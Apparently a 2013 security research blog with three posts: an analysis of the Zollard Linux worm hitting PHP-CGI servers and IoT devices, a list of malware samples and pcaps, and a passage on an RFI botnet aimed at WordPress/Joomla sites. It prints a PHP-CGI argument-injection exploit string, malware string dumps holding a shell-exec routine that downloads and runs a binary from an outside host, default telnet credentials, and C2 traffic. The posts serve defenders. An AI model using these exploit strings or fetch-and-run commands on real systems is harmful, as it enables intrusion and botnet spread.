Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent: Zollard and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.

All files were fetched, and the x86 file was sandboxed on a linux VM.  Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455.  The linux malware also opened up a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445.  Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"
Weak or non-existent passwords allow for a successful telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from 'arm' file
Strings from 'mips' file

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from 'mipsel' file
Strings from 'ppc' file
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from 'x86' file

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured. 

Friday, August 9, 2013

List of malware pcaps, samples, and indicators for the Library of Malware Traffic Patterns

The library of malware traffic patterns have been popular. We found it very useful as well ourselves and we encourage you to send your contributions. I know at some point the spreadsheet will become unwieldy but I personally find it the most easy way (easy sort, search etc)

Currently, most of the samples described have the corresponding samples and pcaps available for download (email Mila @contagio for the password)
such as you see in the links below
http://bit.ly/crimesamples | http://bit.ly/crimepcaps
http://bit.ly/aptsampleshttp://bit.ly/aptpcaps


Email us at mila [a t ] Deependresearch.org or adimino [a t] deependresearch.org


The current list of malware described (as of Aug. 9, 2013)


#APTCRIME and HACKTIVISM
19002Adware Hotbar
Alina POS v5.3-6
29002 POSTAndromeda
3Banechant 1ArcomRat / Dokstormac
4Banechant payload dl 2Ardamax keylogger
5BeebusAsprox Checkin
6Beebus C2 checkinAsproxGET list of C2s
7Beebus data sendAsproxGETs spam template
8Comfoo / Vinself / MspubAvatar Rootkit
9Cookies /Cookiebag / DalbotBeebone downloader
10CoswidBitcoinminer
11CVE-2012-0754 SWF in DOCBlackhole 2
12CVE-2012-0779Blackhole v2
13DepyotBlazebot
14Destory Rat / Sogu / ThoperCarberp
15Disttrack / ShamoonCitadel
16DNSWatch / ProtuxCutwail / Pushdo
17Downloader BMPDarkmegi
18EinsteinDarkness DDos v8g
19Einstein data sendDirtJumper DDoS
20Enfal / LuridDNSChanger
21FavoritesEK - Blackhole 2 landing
22FoxyEK Blackhole 1
23Foxy CheckinEK Neutrino
24Gh0stEK Phoenix
EK Popads
25Gh0st ASP verFakeAV var (via Kuluoz - Asprox botnet)
26Gh0st PHP verFlashback OSX
27Gh0st v2000 varGameThief
28Gh0st varGapz C&C request
29GlassesGuntior - CN bootkit
30GoogleAdC2Gypthoy
31GoogleAdC2 2nd stageHiloti
32GooglesHOIC DDoS
33GreencatHorst Proxy
34GtalkImaut
35Hangover Smackdown MinaproIRCbot
36Hupigon / GraybirdJBOSS worm
37icon.js - system info sendKaragany Loader
38IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRATKuluoz.B downloader
39IXESHEMatsnu - MBR wiping ransomware
40IXESHE AESMedfos
41KoreanBanker DLMoney loader
42Letsgo / TabMsgSQLMutopy Downloader
43Letsgo / TabMsgSQL downloaderMutopy Downloader initial callback
44LikseputPassAlert
45Lingbo (?)Pony loader
46Luckycat - WIMMIEPowerLoader
47LURKRanbyus / Triton (Spy, Banking, smart cards)
48Mediana ProxyReedum
49MiniASPShiz / Rohimafo DDoS
50MinidukeSrizbi
51MiniflameStabuniq
52MirageSweet Orange EK
53Mirage - later varSymmi Remote File Injector
54MongalTbot tor
55MSWab /YayihTinba aka Zusy
56MurcyUrausy (Ransomware)
57NetravlerUSteal.D
58NfLogVobfus
59NTESSESSXpaj
60Pitty TigerZeroAccess / Sirefef
61PlugxZeroAccess / Sirefef - Counter site checkin
62PNG trojanZeroAccess / Sirefef ppc fraud - redirect
63Poison IvyZeus
64QuarianZeus Gameover
65RedOctober AuthInfo
66RedOctober Sysinfo
67RegSubDat
68RssFeeder
69Sanny / Win32.Daws
70Seasalt
71Sofacy
72Surtr 2nd Stage DL
73Surtr Initial GET
74Swami
75Sykipot / Wyksol
76Taidoor
77Taleret
78Tapaoux
79Tarsip Eclipse
80Tarsip Moon
81Variant Letsgo / TabMsgSQL downloader (comment crew)
82Vinself
83WEBC2_RAVE
84WEBC2-Bolid
85WEBC2-Clover
86WEBC2-CSON
87WEBC2-CSON Response to commands
88WEBC2-HEAD
89WEBC2-Table
90Xtreme Rat

Friday, May 31, 2013

Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan  (Mutopy  - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)

The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2.  Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.


By examining the pcap, we learn that mqtgsvc.exe checks in with domain www.wholists.org 

Unpacked version of conhost.exe  7958F73DAF4B84E3B00E008258EA2E7A contains Base94 alphabet, which is being used for encoding strings and communication requests in addition to common Base64

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 - initial callback

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

d=9kMAR6MOJUHhXRtO9B5McvZUG1PnQQsNrWQASedWQA2tcBNO53wCRf0TCWjYfz98wHw0dMRyIGXPfhtD4VwBT%2FVHLnf6XRZP5EAuY%2BZBAEX9RyRF4UAbT%2F1vIk%2F%2FWhFJ9kAuZetDHk%2FhVgB8wUYcXbVWAlL0Ak938kEcSf1UXx7BVhVJ4EcAWb4NJVL6RxcSvg0xQf1HPVD2XVJb23g%2Bbc9gPWbHZDNy1m8%2FSfBBHVP8VQZ8xFocRPxEAXzQRgBS9l0GdvZBAUn8XS5y5l0PBvZDAEehDiVB4V0bTvQeTHL2VBtT50ELDa1kAEnnVkANrXATTud8AkX9Ewlo2HAnfMB8NHTEciBlz34bQ%2BFcAU%2F1Ry53%2Bl0WT%2BRALmPmQQBF%2FUckReFAG0%2F9byJP%2F1oRSfZALmXrQx5P4VYAfMFGHF21VgJS9ABPd%2FJBHEn9VF8ewVYVSeBHAFm%2BDSVS%2BkcXEr4NMUH9Rz1Q9l1SW9t4J3PPHTZl1XInbMdvIU%2F1RwVB4VYubfpQAE%2FgXBRUz2QbTvdcBVPPcAdS4VYcVMVWAFP6XBx8w1weSfBaF1PPdgpQ%2F1wAReFvIFX9TlRF40EVFK5kE1L9WhxHvg0gRfRaAVThSl8exEEbVPYBXx7QUhxU3EMXTrNIOmvGYC4O13Y0YcZ%2FJnzAXBRU5FIARc9%2BG0PhXAFP9Ucud%2FpdFk%2FkQC5j5kEARf1HJEXhQBtP%2FW8gVf1O

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:10 GMT
Content-Type: application/octet-stream
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20

60
..F...@..>xH.G.....E.G.I._\S.\.E.R.P...R.....\.H..\J.TRC.].O.G\E.VR...@..A.N.@.A..]......GC..C.*

2. www.wholists.org directs the infected host to 'gettrial.store-apps.org' where it requests 'conh11.jpg' for download. We see that it's actually a WIN32 executable rather than a JPG file. The file has hash value of 7958f73daf4b84e3b00e008258ea2e7a and is well detected on VirusTotal
GET /d/conh11.jpg HTTP/1.1
User-Agent: -
Host: gettrial.store-apps.org
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:11 GMT
Content-Type: application/octet-stream
Content-Length: 98304
Last-Modified: Tue, 14 May 2013 20:21:33 GMT
Connection: keep-alive
Keep-Alive: timeout=20
ETag: "51929ccd-18000"
Accept-Ranges: bytes

3.  Next, our bot sends a GET request, "/img/seek.cgi?lin=100&db=ndb" to "seek4.run-stat.org" on 46.165.230.185, followed by a GET to bt.ads-runner.org on 208.115.109.53 for ae1.php 
GET /ae1.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: bt.ads-runner.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OKServer: nginx
Date: Mon, 27 May 2013 03:27:15 GMT
Content-Type: text/plain; charset=iso-8859-1
Content-Length: 373
Connection: close
Vary: Accept-Encoding
Last-Modified: Mon, 27 May 2013 03:27:15 GMT
Accept-Ranges: bytes
PldRR1A8aG1ma11xaWtsbGdwPi1XUUdQPAg+TENPRzwgSG1mayJRaWtsbGdwID4tTENPRzwIPlFX
QEg8SmciamcuIiJOY3ZrbCJhbWdmIm93ZGRma3RnZiIkImR3YWlnZiJmbWVle3F2e25nImBnZiJx
Z3o+LVFXQEg8Igg+UUBNRls8CD5ma3Q8PmMianBnZD8ganZ2cjgtLXV1dSxlYHRjZXBrYW1uYyxh
bW8tYW1vcm1sZ2x2cS1hbW9dcm1ubi1jdUEzeixqdm9uIDxOY3ZrbCJhbWdmIm93ZGRma3RnZiIk
ImR3YWlnZiJmbWVle3F2e25nImBnZiJxZ3o+LWM8Pi1ma3Q8CD4tUUBNRls8CA==

There were several PHP scripts observed being downloaded from 46.165.230.185.  These are part of the arsenal of scripts, one or more of which may be injected to a vulnerable server.  We link here to the PHP scripts we saw in use this malware.  The presence of any of these scripts on a CMS webserver is a good indication of compromise.

4. The next conversation our bot initiated was of particular interest. Here the bot sent multiple requests for "ggu.php" from 'fw.point-up.org' on 85.143.166.221. The server would respond with a single URL representing a Wordpress or Joomla site.
GET /ggu.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0
Host: fw.point-up.org
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 27 May 2013 03:27:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
41
http://redacted.com/English/data/cache/diggCache/f7/19/18/page.php
0


We scripted a fetch of this file every few seconds and have since collected thousands of URLs that will be targeted for exploits.  After receiving the target URL from the server on fw.point-up.org, the bot will attempt exploits with various payloads.  By dumping the VAD of the 'conhost.exe' process, I was able to find references to CMS module paths that have had reported vulnerabilities. For example:
List of URLs from fw.point-up.org
The server response varies depending on the success or failure of the attempt.  Examination of the traffic indicates a much larger proportion of apparently successful exploits than failures.  The following are examples of three different responses that were seen.
1. OKe807f1fcf82d132f9bb018ca6738a19f+0 -- OK followed by 1234567890 MD5 encoded
